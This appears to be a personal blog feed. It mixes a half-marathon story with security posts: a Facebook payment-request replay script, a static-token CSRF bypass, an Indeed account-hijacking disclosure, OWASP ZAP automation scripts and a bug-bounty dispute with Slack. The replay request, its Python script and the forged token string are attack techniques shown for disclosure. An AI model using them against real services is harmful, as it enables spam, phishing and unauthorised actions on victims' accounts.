
How I ran my first half marathon!


A few months ago, the thought of running even 3 miles seemed very daunting. I have always hated running. There have been times when I have literally forced myself to run just because I wanted to, but I have never gotten myself to enjoy it the way many runners do. They call it the runner's high, I think? I still don't know what that is, by the way. I would rather play a sport or do some HIIT-style workouts. I love those and would opt for them over running any day, given the option. I am a big fan of CrossFit.

Anyway, as far as I can remember, the longest I could run non-stop before I started training for the SD Half was maybe 5 minutes tops, at a speed of 5 on a treadmill. That's about 0.4 miles. After that, I would drag myself to the 3-mile mark by alternating running and walking. That was my relationship with running until I decided I was going to run a half marathon NO MATTER WHAT. Half marathons, or any race for that matter, even a 5K, had always been a fleeting idea to me. I have always been intrigued by the people who do them. I always thought that maybe some day I would actually have the courage to do it myself, but I never took it seriously. It was one of those things I really wanted to accomplish but was never really driven towards. It was, at most, a dream!

So, after I moved to San Diego, some of my close friends were going to run the SD Half Marathon and they asked me if I was interested as well. I thought this was probably the best opportunity I would get to train together, run together (not literally, but just be there for each other as support) and actually be focused and dedicated towards something I had only thought about accomplishing all these years. And that was it. I didn't want to let it go.

So, on January 25, I signed up for it and there was no looking back after that. I had roughly 7 weeks to train. I found a training schedule online and tried sticking to it as much as I could. It started really slow for the first 2 weeks, with 2-3 mile runs during the week (walking + running) and long 5-6 mile runs on the weekends. Not to mention, those long runs were brutal. I hated them to the core. I wanted to give up so badly, and it took me forever to get them done. Even after forcing myself to run during the training weeks, I never really enjoyed it. I just pretended to be nonchalant about it and went about it. It was a goal I wanted to complete, so I just sucked it up and ran without thinking.

Weeks passed by, and I could definitely see a lot of improvement in my stamina. I could run non-stop for much longer distances than when I first started. One day, I surprised myself by running 1 mile non-stop and still having some energy in the tank to run more. That was truly groundbreaking, lol. Seeing the improvement, I kept going. The shorter runs during the week grew to 3-4 miles and the longer runs kept getting more brutal at 7-8 miles. My time per mile started to improve as well. I was really happy, and I already felt like I had won a huge battle against my mental block about running long distances. The support from friends, and the curiosity to know how everyone else's training was going (their running times, their weekend long runs, etc.), was a huge advantage in keeping myself motivated throughout the 7 weeks.

Fast forward to the D-day. By then, the maximum distance I had covered in one go was 9 miles (some walking, but mostly running). The longest I had run non-stop without walking was about 3.4 miles in 35 minutes, which was also my fastest pace, averaging 10'19" per mile. So I could technically run a 5K with ease. The total number of miles I had run in training since January 25 was a staggering 97 miles. That's almost 14 miles/week, or 2 miles/day, for 7 weeks. Not bad, eh?!

But not everything goes right all the time, does it? On the D-day, I started fine. I was clocking around 12:00 min/mile for the first 7 miles. I even ran the first 5 miles without stopping, which I had not done before even in training. I was all set to finish the 13.1 miles between 2:35 and 2:45, which was my goal. But I started cramping really badly around the 8th mile. My right thigh and my left foot arch started hurting every time my foot landed on the ground. On top of that, the 10th mile was the most difficult part of the course: it was all uphill. Miles 11-13.1 were probably the easiest, but by that time I was hurting so badly I literally couldn't run, or even walk, without limping. So my pace and timing were all gone by then. Race guards came up to me twice to make sure I was okay because they saw me struggling towards the final miles. But I survived somehow. It sucked to the core. The pain in my foot and thigh was excruciating, but I finally managed to get it done in 3:10. That was almost 25 minutes more than what I had originally aimed for.

Needless to say, I am disappointed with the timing. But I guess there were a few mistakes I made (these are not excuses; I didn't completely achieve what I set out for, and I am just noting them down for posterity) and I hope not to repeat them in case I decide to run a half again:

  • I did not stretch all my muscles properly before the race.
  • I stopped running outside after the first few weeks of training, so the sudden transition from the treadmill back to running outside felt a little off and unexpected.
  • I didn't run my last long run of 10 miles the weekend before the D-day because I didn't feel like it. The last long run before that was 9 miles, the weekend prior. So it had basically been 2 weeks since my last long run, and maybe my body wasn't completely prepared to take on the 13.1 miles on the D-day.

So, what's next?! I honestly don't know. I am going to take some well-earned rest and concentrate more on HIIT-type workouts. I am still not a big fan of long-distance running, and if I ever run again, I will only do it because I want to challenge myself.

 

 

Ability to send payment requests despite being blocked by the recipient

TL;DR – As an attacker, I could send payment requests to anyone on Facebook even if:

  • I am not a friend of the victim recipient
  • The victim recipient has explicitly blocked me from sending any messages in Facebook Messenger

And, if you are interested in the details, here goes..

Payment requests are normally sent as messages from Messenger (and can only be sent to a friend). And if somebody has blocked you from sending them messages (whether they are a friend or not), you can't send them payment requests, or any messages for that matter, from the Facebook Messenger UI.

I observed that this wasn't completely true. If you captured a request to send a payment request (to, let's say, a legitimate friend who hasn't blocked you), it was possible to replay that same request using a proxy tool such as Burp, change the recipient ID to the victim's ID (or anyone else's on Facebook), and it would be sent successfully. Another problem was that the victim would receive an email saying "Attacker has sent you a payment request". So this could also be abused to spam anyone on Facebook and/or carry out a spear-phishing campaign.

The request looked like this:

POST /p2p/payment_requests/_create/ HTTP/1.1
Host: www.facebook.com
Cookie: c_user=<redacted>; xs=<redacted>;
Connection: close

amount=<amount_requested>&offline_threading_id=<redacted>&requestee_id=<profile_id_who_to_send_to>&__a=1&fb_dtsg=<csrf_token>
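
For illustration, here is a minimal sketch of how such a replay could be scripted, assuming the cookies and fb_dtsg token were captured from the attacker's own legitimate session. The parameter names come from the request above; the placeholder values and the use of the Python requests library are just for demonstration:

# Replay sketch: resend the captured payment request with the recipient
# swapped to an arbitrary profile ID. All values are placeholders taken
# from the attacker's own captured session/request.
import requests

cookies = {"c_user": "<redacted>", "xs": "<redacted>"}
data = {
    "amount": "<amount_requested>",
    "offline_threading_id": "<redacted>",
    "requestee_id": "<victim_profile_id>",  # changed from the original friend's ID
    "__a": "1",
    "fb_dtsg": "<csrf_token>",
}

resp = requests.post(
    "https://www.facebook.com/p2p/payment_requests/_create/",
    cookies=cookies,
    data=data,
)
print(resp.status_code)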

Facebook rewarded $1500 for this bug.

 

Running ZAP against an application with proxied test cases inside Docker containers + Reporting in JIRA + Notification in Slack

Building off of my last blog post, I could start two containers – ZAP and the application – and then run ZAP against the application to generate a report. However, I observed that this was not getting me good results. Most of the issues reported were missing-header issues, which weren't that useful to begin with.

So, I had to figure out a way to make this more meaningful and effective if we were to actively deploy such an automated scanning process in our DevOps pipeline.

The way I figured this would work was to get some legitimate traffic into ZAP before beginning the scan. And the way to get traffic into ZAP is to use it as a proxy first, before the actual scanning. Now, this would normally mean browsing the application manually in order to generate that data. But we were trying to automate the entire process, so any form of manual intervention was not desired, at least up to the point where the reports need to be triaged.

Luckily, we had some custom test cases written in Python and Lua that would generate and send API requests to the application. So I simply had to run those first (sending the test case requests to the application, proxied via ZAP) before beginning my ZAP scan. The results of doing this were slightly better. It also took care of the authentication part, because the requests sent by the test cases already contained the headers used to authenticate to the application, so I didn't have to change anything specifically within the ZAP API code.
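
As a rough illustration, this is roughly what pointing a test request at ZAP looks like. The endpoint, auth header and ZAP address below are placeholders (our actual test cases are more involved):

# Sketch: route a test request through the ZAP proxy so that ZAP records
# real, authenticated traffic before the scan. Host, port, endpoint and
# auth header are placeholders.
import requests

ZAP_PROXY = "http://127.0.0.1:8090"  # wherever the ZAP daemon is listening
proxies = {"http": ZAP_PROXY, "https": ZAP_PROXY}

headers = {"Authorization": "Bearer <token>"}  # auth already present in the test cases

resp = requests.get(
    "http://app.example.com/api/v1/items",
    headers=headers,
    proxies=proxies,
    verify=False,  # ZAP intercepts TLS, so skip certificate verification here
)
print(resp.status_code)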

We got a few more issues than just the header stuff, so I was happy the approach worked. There is still a lot of work to be done, but since the application I am dealing with is not a traditional web application, I am now looking at a slightly different route and maybe doing something more than just running the ZAP scan. More on that later, as and when I have something to blog about.

A few more things I added to this process: the reports are now automatically sent to our JIRA instance, and a ticket gets created with the reports as attachments. We also have a Slack webhook built in, so whenever this ticket is created, a notification is posted to our Slack channel letting everyone know that the scan was run and that the report is attached to the JIRA ticket for auditing purposes. I also added some exception handling and cleaned up the code a little bit.
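
The Slack piece boils down to posting a small JSON payload to an incoming-webhook URL. Here is a minimal sketch of that step; the webhook URL and ticket key are placeholders, and in our setup the notification is actually triggered by the ticket creation:

# Sketch: notify a Slack channel via an incoming webhook once the JIRA
# ticket has been created. Webhook URL and ticket key are placeholders.
import json
import requests

SLACK_WEBHOOK_URL = "https://hooks.slack.com/services/<webhook_path>"

def notify_slack(ticket_key):
    payload = {"text": "ZAP scan completed. Report attached to JIRA ticket %s" % ticket_key}
    requests.post(SLACK_WEBHOOK_URL, data=json.dumps(payload),
                  headers={"Content-Type": "application/json"})

notify_slack("SEC-123")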

Overall, the complete automated process looks like:

[Diagram: test cases proxied via ZAP → ZAP scan → report attached to a JIRA ticket → Slack notification]

zaprun.sh can be found here.

runzap.py can be found here.

jiraconnect.sh can be found here. For this script, you will also need to create a folder called "data" in $pwd and add 2 files to that directory: credentials.json and data.json. credentials.json holds the username and password used to authenticate to JIRA. It will look something like this:

{
  "username": "<username>",
  "password": "<password>"
}

data.json holds the ID of your JIRA project, plus the summary, description, issue type and label for the issue that will get created. This information can easily be obtained from your JIRA installation using the REST API Browser plugin. It will look something like this:

{
  "fields": {
    "project": {
      "id": "<id>"
    },
    "summary": "ZAP Scan Result",
    "description": "This issue contains the scan results when ZAP is run against the app",
    "issuetype": {
      "id": "<>"
    },
    "labels": [
      "scan"
    ]
  }
}
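
For reference, here is a rough sketch of what the ticket creation and attachment step can look like against the standard JIRA REST API, using the two JSON files above. The JIRA base URL and the report filename are placeholders; the actual jiraconnect.sh script is linked above:

# Sketch: create a JIRA issue from data.json and attach the ZAP report to it.
# The JIRA base URL and the report path are placeholders.
import json
import requests

JIRA_URL = "https://jira.example.com"

with open("data/credentials.json") as f:
    creds = json.load(f)
auth = (creds["username"], creds["password"])

with open("data/data.json") as f:
    issue_fields = json.load(f)

# Create the issue using the fields defined in data.json
resp = requests.post(JIRA_URL + "/rest/api/2/issue/", json=issue_fields, auth=auth)
issue_key = resp.json()["key"]

# Attach the scan report to the newly created issue
with open("report.xml", "rb") as report:
    requests.post(
        JIRA_URL + "/rest/api/2/issue/%s/attachments" % issue_key,
        files={"file": report},
        headers={"X-Atlassian-Token": "no-check"},
        auth=auth,
    )
print("Created %s with the report attached" % issue_key)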

And that's it! A fully automated process of running OWASP ZAP in your DevOps build pipeline, with test cases proxied via ZAP inside Docker containers, reporting in JIRA and notifications sent to Slack.

Feel free to reach out to me if you have any questions or just to share your experiences if you have been trying to do something similar.

Cheers!!

Automating ZAP running against a web application in Docker Containers

To start off, this has been a fun learning experience for me. It had been a while since I did any sort of Bash/Python scripting, so it definitely got me back on track. Also, there are some resources out there, but nothing really helped with the particular case I was looking to solve. Lastly, I will try to turn this into a series of blog posts where I go much deeper into ZAP scanning and reports, integration with CI build servers, etc., as and when time permits. And, by the way, you will need to know the basics of working with Docker in order to follow this post. Having said that, I will try to explain most of the commands in my scripts. So, let's begin.

TL;DR of this post:

1. You install Docker.

2. You run a custom bash script.

3. This bash script starts 2 Docker containers from 2 different images:

  • One is a sample web application. The name of the image from where this container is built is “training/webapp”. This can be found on Docker Hub.
  • The other container is built from a custom image which in turn is built on top of “owasp/zap2docker-stable” image found on Docker Hub.

4. Once both containers are started, ZAP runs against the web app. It does some very basic spidering and scanning. Once everything is done, the report is stored on the ZAP container.

5. The report is then transferred onto the host and all the containers are deleted.

So, basically, you ran ZAP against a web app and generated an XML report on your file system – all automated by just one script!

The main bash script (zaprun.sh) mentioned in point 2 above is as follows. I have left comments above each command, so it should be self-explanatory. Try to understand this script and save it for now; we will run it later on:

#!/bin/bash

set -e

# Running the sample webapp and storing the ID in a variable
WEBCONTAINERID=$(docker run -d -P --name web training/webapp python app.py)
echo Container ID = $WEBCONTAINERID

# Inspecting the above container to gather its IP address and port that will be accessible to the ZAP container to run the scan against
WEBDOCKERIP=$(docker inspect $WEBCONTAINERID | grep -w IPAddress | sed 's/.*IPAddress": "//' | sed 's/",$//')
echo Webapp Docker IP = $WEBDOCKERIP

WEBDOCKERPORT=$(docker port $WEBCONTAINERID | sed 's/\/tcp.*//')
echo Webapp Docker Port = $WEBDOCKERPORT

# Running the ZAP container. Notice that it is built from a custom image called test (built on top of the owasp/zap2docker-stable image) and runs a custom python script, runzap.py. I will provide both later on.
ZAPCONTAINERID=$(docker run -d --name zap test python /zap/ZAP_2.4.0/runzap.py http://$WEBDOCKERIP:$WEBDOCKERPORT)
echo ZAP Container ID = $ZAPCONTAINERID

# Inspecting the above container to see whether it is running or not. If it is not running, that means ZAP has finished the scan and the report is generated.
STATUS=$(docker inspect $ZAPCONTAINERID | grep Running | sed 's/"Running"://' | sed 's/,//')

flag="1"
while [ "$flag" = "1" ]; do
  if [ $STATUS == "true" ]; then
    sleep 5
    echo ZAP is running..
    flag=1
    STATUS=$(docker inspect $ZAPCONTAINERID | grep Running | sed 's/"Running"://' | sed 's/,//')
  else
    sleep 5
    echo ZAP has stopped
    flag=0
    STATUS=$(docker inspect $ZAPCONTAINERID | grep Running | sed 's/"Running"://' | sed 's/,//')
  fi
done

# Copying the report to the Host OS
echo Copying the report to host in the current directory with the name report.xml
docker cp $ZAPCONTAINERID:/zap/ZAP_2.4.0/report.xml .

# Deleting all the containers that were created as a result of this script
echo Deleting the ZAP Container
docker rm $ZAPCONTAINERID

if [ $? -eq 0 ]; then
  echo Stopping the Webapp Container
  docker stop $WEBCONTAINERID
fi

if [ $? -eq 0 ]; then
  echo Deleting the Webapp Container
  docker rm $WEBCONTAINERID
fi

Now, on your host OS, create a folder and paste the following 2 files in that folder:

  1. Dockerfile (self-explanatory)

FROM owasp/zap2docker-stable

MAINTAINER Anshuman Bhartiya <anshuman.bhartiya@gmail.com>

RUN apt-get update && apt-get install -y \
    python-pip

RUN pip install python-owasp-zap-v2

ADD runzap.py /zap/ZAP_2.4.0/

2. runzap.py (This script is slightly modified from here. Credit also due here.)

#!/usr/bin/env python

import os
import subprocess
import time
import urllib
from pprint import pprint
from zapv2 import ZAPv2
import sys

# Starting ZAP as a daemon on port 8090
print 'Starting ZAP ...'
subprocess.Popen(["zap.sh", "-daemon", "-port 8090", "-host 0.0.0.0"], stdout=open(os.devnull, 'w'))
print 'Waiting for ZAP to load, 10 seconds ...'
time.sleep(10)

# Taking the IP address to scan against through the command line. This is where you will provide the value for http://$WEBDOCKERIP:$WEBDOCKERPORT in the above bash script
target = sys.argv[1]
print target

zap = ZAPv2()
print 'Accessing target %s' % target
zap.urlopen(target)
time.sleep(2)

# Spidering the target
print 'Spidering target %s' % target
zap.spider.scan(target)
time.sleep(2)
while (int(zap.spider.status) < 100):
    print 'Spider progress %: ' + zap.spider.status
    time.sleep(2)
print 'Spider completed'
time.sleep(5)

# Scanning the target
print 'Scanning target %s' % target
zap.ascan.scan(target)
while (int(zap.ascan.status) < 100):
    print 'Scan progress %: ' + zap.ascan.status
    time.sleep(5)
print 'Scan completed'

# Saving the XML report on the file system of the ZAP container at /zap/ZAP_2.4.0/report.xml, which we will later copy to the Host OS
with open("/zap/ZAP_2.4.0/report.xml", "w") as f:
    f.write(zap.core.xmlreport)

zap.core.shutdown()

That's pretty much all you need – just 3 files:

  1. The main bash script. I have uploaded this here as well.
  2. Dockerfile to build the custom image and container. I have uploaded this here as well.
  3. runzap.py script that is used to start the ZAP daemon and run it against an IP. I have uploaded this here as well.

Once you have all these files, navigate to the folder you created on your host OS and build the Dockerfile with the following command:

docker build -t test .

After the image is built, type:

docker images

You should now see the test image listed in your repository.

And, to save some time, pull the other image as well with the following command:

docker pull training/webapp

In the end, you should see three Docker images in your repository:

  1. test
  2. owasp/zap2docker-stable
  3. training/webapp

You should be good to go now to run the main bash script. So, just enter:

bash zaprun.sh

Hopefully, everything goes fine and you will see the report.xml file in your current directory.

Cheers!!

A CSRF Protection Bypass Technique

This technique can be used to bypass CSRF protection in some applications by submitting a static CSRF token (the same one for all users of the application) that merely matches a specific format.

So, to begin with, have you ever noticed CSRF tokens that look something like this:

RHAU3cgmTvWy6RWSj+NdJy2v8y8Z0g2U5qTQg4ap/lqeLEfA==

If you have, have you ever looked at it more closely? The above string is basically divided into 3 parts separated by some delimiters. In the above example, the first part “RHAU3cgmTvWy6RWSj” and the second part “NdJy2v8y8Z0g2U5qTQg4ap” are separated by the delimiter “+”. The second part “NdJy2v8y8Z0g2U5qTQg4ap” and the third part “lqeLEfA” are separated by the delimiter “/”. The string finally ends with “==”.

So, considering the above example, if you encounter an application that uses CSRF tokens as shown above, try fiddling with the actual string making sure you keep the format consistent i.e. 3 parts separated by some delimiters and so on and so forth.

In my case, the format ended up being “xxxxxxxxxxxxxxxxxxxxxxxxx%2Bxxxxxxxxxxxxxxxxxxxxxxxxxx%2Fxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw%3D%3D” which when decoded is “xxxxxxxxxxxxxxxxxxxxxxxxx+xxxxxxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw==”

The length of the above string (or the number of x's) will vary between applications. So, consider this just a PoC.

In a nutshell, what I observed was that an attacker could trick a victim into submitting a POST request with the above string as the CSRF token POST parameter, and the application server would gladly accept it, because it was only checking that the token matched a specific format and never compared the received value to the value stored on the server side. As a result, I was able to bypass CSRF protection throughout the entire application.
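
To make the flaw concrete, here is a hypothetical sketch of what the vulnerable check effectively boils down to, compared with a proper check. The regex and function names are mine, not the application's actual code:

# Hypothetical illustration of the flaw (not the application's actual code):
# the server only checks that the submitted token *looks* like a valid token,
# instead of comparing it to the per-session value it issued.
import hmac
import re

TOKEN_FORMAT = re.compile(r"^[A-Za-z0-9]+\+[A-Za-z0-9]+/[A-Za-z0-9]+==$")

def vulnerable_check(submitted_token):
    # Any attacker-chosen string matching the format passes, including a
    # single static token reused for every user.
    return bool(TOKEN_FORMAT.match(submitted_token))

def proper_check(submitted_token, session_token):
    # The fix: compare against the token actually tied to the victim's session.
    return hmac.compare_digest(submitted_token, session_token)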

———————————————————————

There are some more nuances to the above scenario as well. Consider the case of double-submit CSRF protection. What that entails is that the CSRF token needs to be sent in two places: for example, one in a session cookie and one in the POST body. Or one in a custom header and one in the session cookie. Or one in a custom header and one in the POST body. There are multiple possible combinations.

The gist is that both values need to be the same. This is mostly done to avoid the headache of storing CSRF values on the server side. In such cases, bypassing the protection is not easy, because as an attacker you don't really have any control over a victim's browser to set custom headers or session cookies. The most you can do is trick a victim into submitting a malicious POST request. But since the browser sends the headers and/or cookies automatically, the chances of those values matching the value in your POST request are negligible. Hence the protection, if implemented properly, can be quite effective.

But in the example discussed above, it was observed that even though the browser was automatically sending the real custom header and/or session cookie alongside the attacker-supplied value "xxxxxxxxxxxxxxxxxxxxxxxxx%2Bxxxxxxxxxxxxxxxxxxxxxxxxxx%2Fxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw%3D%3D" in the POST body, the server was only checking that the format matched, not the actual values. So again, this was a complete CSRF protection bypass: it didn't matter what CSRF values the browser was sending (as headers and/or cookies) as long as an attacker could trick a victim into submitting a POST request with the above static CSRF string.

I am not sure if this technique was already known. If it was, pardon my ignorance. I found it during testing and thought it was pretty interesting, hence this post.

Cheers!

Account Hijacking in Indeed

Authenticating to an account in the Indeed iPhone app and then changing the country appears to log the user out. The country changes just fine, but instead of the user remaining logged in, a "Sign In" option appears in the application. When the user taps this "Sign In" option, a set of requests is sent to the server that automatically logs the user back in (obviously, because the user never actually logged out in the first place; they just changed the country).

Among these requests, there is one in particular that gets sent to the "/account/checklogin" endpoint with the "passrx" value over plain HTTP. This means a MiTM attacker can easily capture this URL off the network.

The attacker can then use the captured URL to take over the victim’s account completely.

It should also be noted that this is not only an account hijacking vulnerability but also a login CSRF vulnerability: an attacker can capture the above request for his own account and then trick a victim into logging in to that account.

But, obviously, the more serious issue here is account hijacking by a MiTM attacker.

A PoC video demonstrating the vulnerability is here.

This vulnerability was reported via Bugcrowd to the Indeed bug bounty program and was deemed a duplicate. I then got explicit permission from the program owners to disclose it publicly.

Cheers!

A little note about Slack’s Bug Bounty program

I reported a bug to Slack via HackerOne on December 13, 2014. Slack closed it as N/A. Since it was N/A, I went ahead and blogged about it here on December 18, 2014. I also gave them a heads-up on the HackerOne submission that I would be disclosing it before I actually did. They kept radio silence, so I assumed they didn't have any issues. They never asked me not to disclose or anything like that, which would make sense because marking it N/A means they were not interested in the bug in the first place.

Around the same time, or rather a day earlier, on December 12, 2014, I had reported another bug to Slack via HackerOne. They closed it as a duplicate. The entire submission, along with the conversations, can be found here. In a nutshell, they wanted to do a coordinated disclosure once the issue was fixed. I was perfectly fine with that. I completely understand and respect the ethics of a bug bounty program, and I agreed. But after that, there was complete radio silence. I tried following up multiple times, but nobody cared to respond or update me regarding the fix, as is evident from the document. I also left a comment (1 month, and then again 4 days, before the disclosure) saying that if I didn't hear back with any update, I would go ahead and disclose it 90 days after the initial submission. That seems to be the industry trend these days, so I chose to stick with it. I finally disclosed it here on this blog.

On March 12, 2015, I reported yet another bug to Slack, again via the HackerOne platform. This bug was closed today, March 16, 2015, as N/A without any explanation or reasoning. The entire conversation, along with the bug submission, can be found here. Consider this document a public disclosure for this bug, since it is marked and closed as N/A and they don't seem to be interested in it anyway.

As evident from the latest bug submission document, I have been told that I have "gone against the spirit of a bug bounty program by disclosing things without consent". They feel that for the second bug described above, "the disclosure is owned by the original reporter" and that "By disclosing this without coordinating" I have stolen "the original reporter's opportunity to disclose a finding." They apparently spoke to HackerOne last week and asked for me to be removed from participating in their bug bounty program. I was supposedly going to receive some communication regarding this (which, by the way, I never did).

Final Thoughts:

I am honestly very disappointed with how things have been handled. I personally don't think I did anything against the spirit of a bug bounty program. I am all for coordinated disclosure, but if the program owners fail to coordinate or communicate in a timely manner, there is no such thing as coordinated disclosure. Combined with their responses on all my bug submissions and their decision to ban me from their bug bounty program, this is probably the worst experience I have had so far, and I feel it is a perfect example of how not to operate a bug bounty program.

I would love to get some feedback and thoughts on this. I am open to criticism and to improving anything I could have done better on my side to make this less painful.